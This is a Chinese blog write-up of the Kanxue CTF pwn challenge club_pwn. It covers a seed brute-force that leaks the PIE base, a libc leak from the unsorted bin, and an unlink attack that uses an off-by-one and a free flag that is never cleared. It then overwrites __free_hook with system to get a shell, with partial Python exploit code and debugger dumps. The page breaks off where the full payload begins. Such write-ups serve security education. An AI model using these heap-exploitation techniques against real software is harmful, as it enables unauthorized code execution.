<!DOCTYPE html>
<html >
<head>

    <!-- hexo-inject:begin --><!-- hexo-inject:end --><!--[if lt IE 9]>
        <style>body {display: none; background: none !important} </style>
        <meta http-equiv="Refresh" Content="0; url=//outdatedbrowser.com/" />
    <![endif]-->

<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
<meta name="format-detection" content="telephone=no" />
<meta name="author" content="Hcamael" />



<meta name="description" content="前几天做了看雪ctf的一道pwn题，但是工作比较忙，一直没时间写wp，今天有空了，把wp补上">
<meta name="keywords" content="bin">
<meta property="og:type" content="article">
<meta property="og:title" content="看雪CTF 第四题club_pwn writeup">
<meta property="og:url" content="http://0x48.pw/2017/11/03/0x3C/index.html">
<meta property="og:site_name" content="Hc1m1">
<meta property="og:description" content="前几天做了看雪ctf的一道pwn题，但是工作比较忙，一直没时间写wp，今天有空了，把wp补上">
<meta property="og:updated_time" content="2017-11-03T08:11:27.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="看雪CTF 第四题club_pwn writeup">
<meta name="twitter:description" content="前几天做了看雪ctf的一道pwn题，但是工作比较忙，一直没时间写wp，今天有空了，把wp补上">

<link rel="apple-touch-icon" href= "/apple-touch-icon.png">


    <link rel="alternate" href="/rss.xml" title="Hc1m1" type="application/atom+xml">



    <link rel="shortcut icon" href="/img/favicon.png">



    <link href="//cdn.bootcss.com/animate.css/3.5.1/animate.min.css" rel="stylesheet">



    <link href="//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.css" rel="stylesheet">



    <script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
    <link href="//cdn.bootcss.com/pace/1.0.2/themes/blue/pace-theme-minimal.css" rel="stylesheet">


<link rel="stylesheet" href="/css/style.css">



<link href="//cdn.bootcss.com/font-awesome/4.6.3/css/font-awesome.min.css" rel="stylesheet">


<title>看雪CTF 第四题club_pwn writeup | Hc1m1</title>

<script src="//cdn.bootcss.com/jquery/2.2.4/jquery.min.js"></script>
<script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script>

<script>
    var yiliaConfig = {
        fancybox: true,
        animate: true,
        isHome: false,
        isPost: true,
        isArchive: false,
        isTag: false,
        isCategory: false,
        fancybox_js: "//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.js",
        scrollreveal: "//cdn.bootcss.com/scrollReveal.js/3.1.4/scrollreveal.min.js",
        search: undefined
    }
</script>


    <script>
        yiliaConfig.jquery_ui = [true, "//cdn.bootcss.com/jqueryui/1.10.4/jquery-ui.min.js", "//cdn.bootcss.com/jqueryui/1.10.4/css/jquery-ui.min.css"];
    </script>



    <script> yiliaConfig.rootUrl = "\/";</script>





    <script>
        var _hmt = _hmt || [];
        (function() {
            var hm = document.createElement("script");
            hm.src = "//hm.baidu.com/hm.js?4b6b8b9a09d24f4d4e26c50bd1707fd7";
            var s = document.getElementsByTagName("script")[0]; 
            s.parentNode.insertBefore(hm, s);
        })();
    </script><!-- hexo-inject:begin --><!-- hexo-inject:end -->


</head>
<body>
  <!-- hexo-inject:begin --><!-- hexo-inject:end --><div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        <a href="/" class="profilepic">
            <img src="//qn.lazysheep.cc/img/author.png" class="animated zoomIn">
        </a>
        <hgroup>
          <h1 class="header-author"><a href="/">Hcamael</a></h1>
        </hgroup>

        
        <p class="header-subtitle">Blog</p>
        

        


        
            <div id="switch-btn" class="switch-btn">
                <div class="icon">
                    <div class="icon-ctn">
                        <div class="icon-wrap icon-house" data-idx="0">
                            <div class="birdhouse"></div>
                            <div class="birdhouse_holes"></div>
                        </div>
                        <div class="icon-wrap icon-ribbon hide" data-idx="1">
                            <div class="ribbon"></div>
                        </div>
                        
                        <div class="icon-wrap icon-link hide" data-idx="2">
                            <div class="loopback_l"></div>
                            <div class="loopback_r"></div>
                        </div>
                        
                        
                        <div class="icon-wrap icon-me hide" data-idx="3">
                            <div class="user"></div>
                            <div class="shoulder"></div>
                        </div>
                        
                    </div>
                    
                </div>
                <div class="tips-box hide">
                    <div class="tips-arrow"></div>
                    <ul class="tips-inner">
                        <li>菜单</li>
                        <li>标签</li>
                        
                        <li>友情链接</li>
                        
                        
                        <li>关于我</li>
                        
                    </ul>
                </div>
            </div>
        

        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a href="/">主页</a></li>
                        
                            <li><a href="/archives/">所有文章</a></li>
                        
                            <li><a href="/tags/">标签云</a></li>
                        
                            <li><a href="/about/">关于我</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa Email" href="mailto: baiyjrh@gmail.com" title="Email"></a>
                            
                                <a class="fa GitHub" href="https://github.com/Hcamael" title="GitHub"></a>
                            
                                <a class="fa RSS" href="/rss.xml" title="RSS"></a>
                            
                        </ul>
                    </nav>
                </section>
                
                
                <section class="switch-part switch-part2">
                    <div class="widget tagcloud" id="js-tagcloud">
                        <ul class="tag-list"><li class="tag-list-item"><a class="tag-list-link" href="/tags/CTF/">CTF</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Crypto/">Crypto</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/GIT/">GIT</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Linux/">Linux</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Pentest/">Pentest</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Python/">Python</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/RE/">RE</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/SQLi/">SQLi</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Web/">Web</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/bin/">bin</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/network/">network</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/old-blog/">old_blog</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/php/">php</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/research/">research</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/sb/">sb</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/share/">share</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/随笔/">随笔</a></li></ul>
                    </div>
                </section>
                
                
                
                <section class="switch-part switch-part3">
                    <div id="js-friends">
                    
                      <a class="main-nav-link switch-friends-link" href="http://vidar.club">Vidar-Team</a>
                    
                      <a class="main-nav-link switch-friends-link" href="https://wiki.vidar.club/doku.php">wiki</a>
                    
                      <a class="main-nav-link switch-friends-link" href="https://drops.vidar.club/">Drops</a>
                    
                      <a class="main-nav-link switch-friends-link" href="http://lightless.me">lightless</a>
                    
                      <a class="main-nav-link switch-friends-link" href="http://homeway.me">夏日小草</a>
                    
                      <a class="main-nav-link switch-friends-link" href="http://www.edwardl.xyz">Edward_L</a>
                    
                      <a class="main-nav-link switch-friends-link" href="http://aklis.info">Aklis</a>
                    
                      <a class="main-nav-link switch-friends-link" href="http://libc.pw">Explorer</a>
                    
                      <a class="main-nav-link switch-friends-link" href="http://lorexxar.cn">Lorexxar</a>
                    
                      <a class="main-nav-link switch-friends-link" href="http://misty.moe/">Misty</a>
                    
                      <a class="main-nav-link switch-friends-link" href="http://www.venenof.com/">Veneno</a>
                    
                      <a class="main-nav-link switch-friends-link" href="http://www.wupco.cn">Wupco</a>
                    
                      <a class="main-nav-link switch-friends-link" href="http://www.scanfsec.com">scanf</a>
                    
                      <a class="main-nav-link switch-friends-link" href="http://repwn.com">Bird</a>
                    
                      <a class="main-nav-link switch-friends-link" href="http://pzhxbz.cn">pzhxbz</a>
                    
                      <a class="main-nav-link switch-friends-link" href="http://veritas501.space/">veritas</a>
                    
                    </div>
                </section>
                

                
                
                <section class="switch-part switch-part4">
                
                    <div id="js-aboutme">HDUISA, web狗, 菜鸡H, 正在向bin爷爷努力前进</div>
                </section>
                
            </div>
        </div>
    </header>                
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="回到主页">Hcamael</a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                <img src="//qn.lazysheep.cc/img/author.png" class="animated zoomIn">
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="回到主页">Hcamael</a></h1>
            </hgroup>
            
            <p class="header-subtitle">Blog</p>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/">主页</a></li>
                
                    <li><a href="/archives/">所有文章</a></li>
                
                    <li><a href="/tags/">标签云</a></li>
                
                    <li><a href="/about/">关于我</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa Email" target="_blank" href="mailto: baiyjrh@gmail.com" title="Email"></a>
                            
                                <a class="fa GitHub" target="_blank" href="https://github.com/Hcamael" title="GitHub"></a>
                            
                                <a class="fa RSS" target="_blank" href="/rss.xml" title="RSS"></a>
                            
                        </ul>
            </nav>
        </header>                
    </div>
    <link class="menu-list" tags="标签" friends="友情链接" about="关于我"/>
</nav>
      <div class="body-wrap"><article id="post-0x3C" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2017/11/03/0x3C/" class="article-date">
      <time datetime="2017-11-03T03:47:19.000Z" itemprop="datePublished">2017-11-03</time>
</a>


    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      看雪CTF 第四题club_pwn writeup
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        

        
    <div class="article-tag tagcloud">
        <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/bin/">bin</a></li></ul>
    </div>

        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <p>前几天做了看雪ctf的一道pwn题，但是工作比较忙，一直没时间写wp，今天有空了，把wp补上</p>
<a id="more"></a>
<p>据说这题出题人出题失误，导致题目难度大大下降，预期是house_of_orange的，但是利用unlink就能做了</p>
<h2 id="获取ELF基地址"><a href="#获取ELF基地址" class="headerlink" title="获取ELF基地址"></a>获取ELF基地址</h2><p>程序中有一个猜随机数的功能，代码大致逻辑如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div></pre></td><td class="code"><pre><div class="line">*seed = &amp;seed;</div><div class="line">srand(&amp;seed);</div><div class="line">......</div><div class="line">v1 = rand();</div><div class="line">puts(&quot;Please input the number you guess:&quot;);</div><div class="line">printf(&quot;&gt; &quot;);</div><div class="line">if ( v1 == sub_AFA() )</div><div class="line">	result = printf(&quot;G00dj0b!You get a secret: %ld!\n&quot;, *&amp;seed);</div><div class="line">else</div><div class="line">	result = printf(&quot;Wr0ng answer!The number is %d!\n&quot;, v1);</div><div class="line">return result;</div><div class="line"></div><div class="line">.bss:0000000000202148 seed</div></pre></td></tr></table></figure>
<p>使用seed变量的地址作为伪随机数生成器的种子, 因为这个程序开启了PIE保护，所以实际上每次程序运行，种子都是不一样的, 然后随机生成一个数让你猜，猜对了告诉你种子，猜错了告诉你这个随机数</p>
<p>如果我们能得到种子，因为ELF基地址和seed地址的偏移值是固定的，所以我们就能算出ELF的基地址了</p>
<p>然后去翻阅了下random的源码：<a href="https://code.woboq.org/userspace/glibc/stdlib/random.c.html" target="_blank" rel="external">https://code.woboq.org/userspace/glibc/stdlib/random.c.html</a></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div></pre></td><td class="code"><pre><div class="line">207 void __srandom (unsigned int x)</div><div class="line">209 &#123;</div><div class="line">210     __libc_lock_lock (lock);</div><div class="line">211    (void) __srandom_r (x, &amp;unsafe_state);</div><div class="line">212    __libc_lock_unlock (lock);</div><div class="line">213 &#125;</div><div class="line">214</div><div class="line">215 weak_alias (__srandom, srandom)</div><div class="line">216 weak_alias (__srandom, srand)</div></pre></td></tr></table></figure>
<p>发现，<code>__srandom</code>的参数是无符号整型，长度只有32bit</p>
<p>虽然开了PIE，但ELF的基地址因为系统页对其的原因，最后12bit固定是0，所以，我们只需要爆破20bit，这是非常容易的，下面是部分payload代码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div></pre></td><td class="code"><pre><div class="line">def get_rand_num():</div><div class="line">    guess_num(123)</div><div class="line">    r.readuntil(&quot;is &quot;)</div><div class="line">    random_num = int(r.readuntil(&quot;!&quot;)[:-1])</div><div class="line">    return random_num</div><div class="line"></div><div class="line">def get_elf_base(random_num):</div><div class="line">    guess_num(random_num)</div><div class="line">    r.readuntil(&quot;secret:&quot;)</div><div class="line">    elf_base = int(r.readuntil(&quot;!&quot;)[:-1])</div><div class="line">    return elf_base-seed_address</div><div class="line"></div><div class="line">def guest(random_num):</div><div class="line">    seed_base = 0x202148</div><div class="line">    libc = cdll.LoadLibrary(&quot;libc.so.6&quot;)</div><div class="line">    for x in xrange(0x10000000, 0xfffff000, 0x1000):</div><div class="line">        libc.srand(x+seed_base)</div><div class="line">        if libc.rand() == random_num:</div><div class="line">            next_randnum = libc.rand()</div><div class="line">            break</div><div class="line">    return next_randnum</div><div class="line"></div><div class="line">def main():</div><div class="line">    random_num = get_rand_num()</div><div class="line">    next_randnum = guest(random_num)</div><div class="line">    elf_base = get_elf_base(next_randnum)</div><div class="line">    print &quot;get ELF base address: 0x%x&quot;%elf_base</div></pre></td></tr></table></figure>
<p>因为python的random和c的是不一样的，所以这里使用ctypes去调用libc中的random</p>
<h2 id="ELF中的漏洞"><a href="#ELF中的漏洞" class="headerlink" title="ELF中的漏洞"></a>ELF中的漏洞</h2><p>最关键的一个就是有一个bool标志位，默认值是0，表示该box没有malloc，当malloc后标志位会设置为1，但是当free后，却没有把标志位清零，这就导致可以无限free，一个被free的box，也可以修改和输出box的内容</p>
<p>另一个关键的漏洞是修改box内容的函数中存在off by one</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line">for ( i = 0; dword_202090[v3] &gt;= i; ++i )</div><div class="line">&#123;</div><div class="line">    read(0, &amp;buf, 1uLL);</div><div class="line">    if ( buf == 10 )</div><div class="line">        break;</div><div class="line">        *(i + qword_202100[v3]) = buf;</div><div class="line">&#125;</div></pre></td></tr></table></figure>
<p>如果长度有24的box，却可以输入25个字符</p>
<p>还有一个也算漏洞的是再show message函数中，输出使用了puts，输出是根据<code>\x00</code>判断结尾，而不是长度，而在修改message的函数中也没有在用户输入的数据结尾加<code>\x00</code>，所以有可能导致信息泄露，不过这个漏洞对我来说不重要，我的利用方法中，不包含其信息泄露的利用</p>
<h2 id="获取LIBC基地址"><a href="#获取LIBC基地址" class="headerlink" title="获取LIBC基地址"></a>获取LIBC基地址</h2><p>泄露LIBC地址的思路很简单，上面说了当一个box被free后因为标志位没有被清零，所以任然可以往里面写数据，输出数据。</p>
<p>如果我们free一个非fast chunk的chunk，也就是说free一个chunk size大于maxfastsize的chunk，将会和unsortbin形成双链表，这个时候的结构如下：</p>
<table>
<thead>
<tr>
<th style="text-align:center">prev size</th>
<th style="text-align:center">chunk size</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align:center">fd</td>
<td style="text-align:center">bk</td>
</tr>
</tbody>
</table>
<p>这个时候fd和bk都指向arena中的top_chunk指针，我们能通过输出该box获取到该地址，然后根据偏移值计算出libc的基地址，部分代码如下:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div></pre></td><td class="code"><pre><div class="line">def get_libc_base():</div><div class="line">    free_box(3)</div><div class="line">    show_message(3)</div><div class="line">    data = r.readuntil(&quot;You&quot;)[:-3].strip()</div><div class="line">    top = u64(data+&quot;\x00\x00&quot;)</div><div class="line">    return top - top_chunk</div><div class="line"></div><div class="line">def main():</div><div class="line">    ....</div><div class="line">    create_box(1, 24)</div><div class="line">    create_box(2, 168)</div><div class="line">    create_box(3, 184)</div><div class="line">    create_box(4, 200)</div><div class="line">    libc_base = get_libc_base()</div><div class="line"></div><div class="line">    print &quot;get libc base address: 0x%x&quot;%libc_base</div></pre></td></tr></table></figure>
<p>free的那个box不能是最后一个chunk，否则会和top chunk合并</p>
<h2 id="unlink利用"><a href="#unlink利用" class="headerlink" title="unlink利用"></a>unlink利用</h2><p>网上很多unlink的文章，我就不细说了，简单的来说就是要过一个判断，执行一个指令</p>
<p>需要过一个判断：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">P-&gt;fd-&gt;bk == P</div><div class="line">P-&gt;bk-&gt;fd == P</div></pre></td></tr></table></figure>
<p>执行一个指令</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">FD = P-&gt;fd</div><div class="line">BK = P-&gt;bk</div><div class="line">FD-&gt;bk = BK</div><div class="line">BK-&gt;fd = FD</div></pre></td></tr></table></figure>
<p>当利用之前的代码，泄露完libc地址后，堆布局是这样的：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div></pre></td><td class="code"><pre><div class="line">0x555555757410:	0x0000000000000000	0x0000000000000021   &lt;- box1</div><div class="line">0x555555757420:	0x0000000000000000	0x0000000000000000</div><div class="line">0x555555757430:	0x0000000000000000	0x00000000000000b1   &lt;- box2</div><div class="line">0x555555757440:	0x0000000000000000	0x0000000000000000</div><div class="line">0x555555757450:	0x0000000000000000	0x0000000000000000</div><div class="line">0x555555757460:	0x0000000000000000	0x0000000000000000</div><div class="line">0x555555757470:	0x0000000000000000	0x0000000000000000</div><div class="line">0x555555757480:	0x0000000000000000	0x0000000000000000</div><div class="line">0x555555757490:	0x0000000000000000	0x0000000000000000</div><div class="line">0x5555557574a0:	0x0000000000000000	0x0000000000000000</div><div class="line">0x5555557574b0:	0x0000000000000000	0x0000000000000000</div><div class="line">0x5555557574c0:	0x0000000000000000	0x0000000000000000</div><div class="line">0x5555557574d0:	0x0000000000000000	0x0000000000000000</div><div class="line">0x5555557574e0:	0x0000000000000000	0x00000000000000c1    &lt;- box3</div><div class="line">0x5555557574f0:	0x00007ffff7dd1b78	0x00007ffff7dd1b78</div><div class="line">0x555555757500:	0x0000000000000000	0x0000000000000000</div><div class="line">0x555555757510:	0x0000000000000000	0x0000000000000000</div><div class="line">0x555555757520:	0x0000000000000000	0x0000000000000000</div><div class="line">0x555555757530:	0x0000000000000000	0x0000000000000000</div><div class="line">0x555555757540:	0x0000000000000000	0x0000000000000000</div><div class="line">0x555555757550:	0x0000000000000000	0x0000000000000000</div><div class="line">0x555555757560:	0x0000000000000000	0x0000000000000000</div><div class="line">0x555555757570:	0x0000000000000000	0x0000000000000000</div><div class="line">0x555555757580:	0x0000000000000000	0x0000000000000000</div><div class="line">0x555555757590:	0x0000000000000000	0x0000000000000000</div><div class="line">0x5555557575a0:	0x00000000000000c0	0x00000000000000d0    &lt;- box4</div><div class="line">0x5555557575b0:	0x0000000000000000	0x0000000000000000</div><div class="line">0x5555557575c0:	0x0000000000000000	0x0000000000000000</div></pre></td></tr></table></figure>
<p>然后在.bss段有个地方储存着box的地址：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">pwndbg&gt; x/6gx 0x202100+0x555555554000</div><div class="line">0x555555756100:	0x0000000000000000	0x0000555555757420</div><div class="line">0x555555756110:	0x0000555555757440	0x5555557574f0</div><div class="line">0x555555756120:	0x00005555557575b0	0x0000000000000000</div></pre></td></tr></table></figure>
<p>因为在free box函数的代码中，有一个判断：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">if ( !dword_202130[v1] || dword_2020B0[v1] )</div><div class="line">    return puts(&quot;You can not destroy the box!&quot;);</div></pre></td></tr></table></figure>
<p>而dword_2020B0是已经初始化过，然后没有代码修改过的变量</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">.data:00000000002020B0 dword_2020B0      dd 2 dup(1), 2 dup(0), 2 dup(1)</div></pre></td></tr></table></figure>
<p>扩展开了就是<code>[1, 1, 0, 0, 1, 1]</code></p>
<p>所以只有2， 3两个box能被free</p>
<p>在之前已经free过了box3，如果再次free box3，无法触发unlink操作，unlink操作只有在前一个或者后一个chunk未被使用时才会触发，所以我们需要通过free box2来进行触发unlink操作</p>
<p>通过leave message函数来构造一个堆结构：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div></pre></td><td class="code"><pre><div class="line">pwndbg&gt; x/64gx 0x555555757410</div><div class="line">0x555555757410:	0x0000000000000000	0x0000000000000021</div><div class="line">0x555555757420:	0x0000000000000000	0x0000000000000000</div><div class="line">0x555555757430:	0x0000000000000000	0x00000000000000c1    修改长度为0xc1</div><div class="line">0x555555757440:	0x0000000000000000	0x0000000000000000</div><div class="line">0x555555757450:	0x0000000000000000	0x0000000000000000</div><div class="line">0x555555757460:	0x0000000000000000	0x0000000000000000</div><div class="line">0x555555757470:	0x0000000000000000	0x0000000000000000</div><div class="line">0x555555757480:	0x0000000000000000	0x0000000000000000</div><div class="line">0x555555757490:	0x0000000000000000	0x0000000000000000</div><div class="line">0x5555557574a0:	0x0000000000000000	0x0000000000000000</div><div class="line">0x5555557574b0:	0x0000000000000000	0x0000000000000000</div><div class="line">0x5555557574c0:	0x0000000000000000	0x0000000000000000</div><div class="line">0x5555557574d0:	0x0000000000000000	0x0000000000000000</div><div class="line">0x5555557574e0:	0x0000000000000000	0x00000000000000c1</div><div class="line">0x5555557574f0:	0x00007ffff7dd1b78	0x00000000000000b1     构造成一个新的堆，长度为0xb1</div><div class="line">0x555555757500:	0x0000555555756100	0x0000555555756108     构造fd和bk</div><div class="line">0x555555757510:	0x0000000000000000	0x0000000000000000</div><div class="line">0x555555757520:	0x0000000000000000	0x0000000000000000</div><div class="line">0x555555757530:	0x0000000000000000	0x0000000000000000</div><div class="line">0x555555757540:	0x0000000000000000	0x0000000000000000</div><div class="line">0x555555757550:	0x0000000000000000	0x0000000000000000</div><div class="line">0x555555757560:	0x0000000000000000	0x0000000000000000</div><div class="line">0x555555757570:	0x0000000000000000	0x0000000000000000</div><div class="line">0x555555757580:	0x0000000000000000	0x0000000000000000</div><div class="line">0x555555757590:	0x0000000000000000	0x0000000000000000</div><div class="line">0x5555557575a0:	0x00000000000000b0	0x00000000000000d0      修改prev_size为0xb0</div><div class="line">0x5555557575b0:	0x0000000000000000	0x0000000000000000</div><div class="line">0x5555557575c0:	0x0000000000000000	0x0000000000000000</div><div class="line">0x5555557575d0:	0x0000000000000000	0x0000000000000000</div><div class="line">0x5555557575e0:	0x0000000000000000	0x0000000000000000</div><div class="line">0x5555557575f0:	0x0000000000000000	0x0000000000000000</div><div class="line">0x555555757600:	0x0000000000000000	0x0000000000000000</div></pre></td></tr></table></figure>
<p>构造了一个fd和bk指向存储box 地址的.bss段，这样就能构成一个双链表，bypass unlink的check:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">P-&gt;fd-&gt;bk == P</div><div class="line">P-&gt;bk-&gt;fd == P</div></pre></td></tr></table></figure>
<p>不过这个时候如果free box2，会报错退出，报错的内容是 <code>free(): corrupted unsorted chunks</code></p>
<p>去源码中搜一下该error的check:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">4248  bck = unsorted_chunks(av);</div><div class="line">4249  fwd = bck-&gt;fd;</div><div class="line">4250  if (__glibc_unlikely (fwd-&gt;bk != bck))</div><div class="line">4251      malloc_printerr (&quot;free(): corrupted unsorted chunks&quot;)</div></pre></td></tr></table></figure>
<p>bck指向unsortbin，所以fwd指向box3，然而box3的bk已经被构造成了新chunk的size位，所以报错退出了</p>
<p>这个时候只需要在free box2之前，malloc一个box5，这样将会把unsortbin中的box3分类到smallbin中，从而bypass unsortbin check</p>
<h2 id="利用"><a href="#利用" class="headerlink" title="利用"></a>利用</h2><p>在free box2之后，内存大致如下:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">pwndbg&gt; x/6gx 0x202100+0x555555554000</div><div class="line">0x555555756100:	0x0000000000000000 0x0000555555757420</div><div class="line">0x555555756110:	0x0000555555757440 0x0000555555756100</div><div class="line">0x555555756120:	0x00005555557575b0 0x0000555555757680</div></pre></td></tr></table></figure>
<p>box3的地址已经指向该bss段，从而我们已经可以做到任意地址写了</p>
<p>我的利用思路是，把box 2修改为free_hook的地址，然后把box 0修改为<code>/bin/sh\0</code>正好8byte，这样box 3就是一个<code>/bin/sh</code>字符串了</p>
<p>我们只需要在free_hook中写上system的地址，调用free(box 3)，则相当于调用system(“/bin/sh\0”)，从而达到getshell</p>
<p>完整payload如下:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div><div class="line">72</div><div class="line">73</div><div class="line">74</div><div class="line">75</div><div class="line">76</div><div class="line">77</div><div class="line">78</div><div class="line">79</div><div class="line">80</div><div class="line">81</div><div class="line">82</div><div class="line">83</div><div class="line">84</div><div class="line">85</div><div class="line">86</div><div class="line">87</div><div class="line">88</div><div class="line">89</div><div class="line">90</div><div class="line">91</div><div class="line">92</div><div class="line">93</div><div class="line">94</div><div class="line">95</div><div class="line">96</div><div class="line">97</div><div class="line">98</div><div class="line">99</div><div class="line">100</div><div class="line">101</div><div class="line">102</div><div 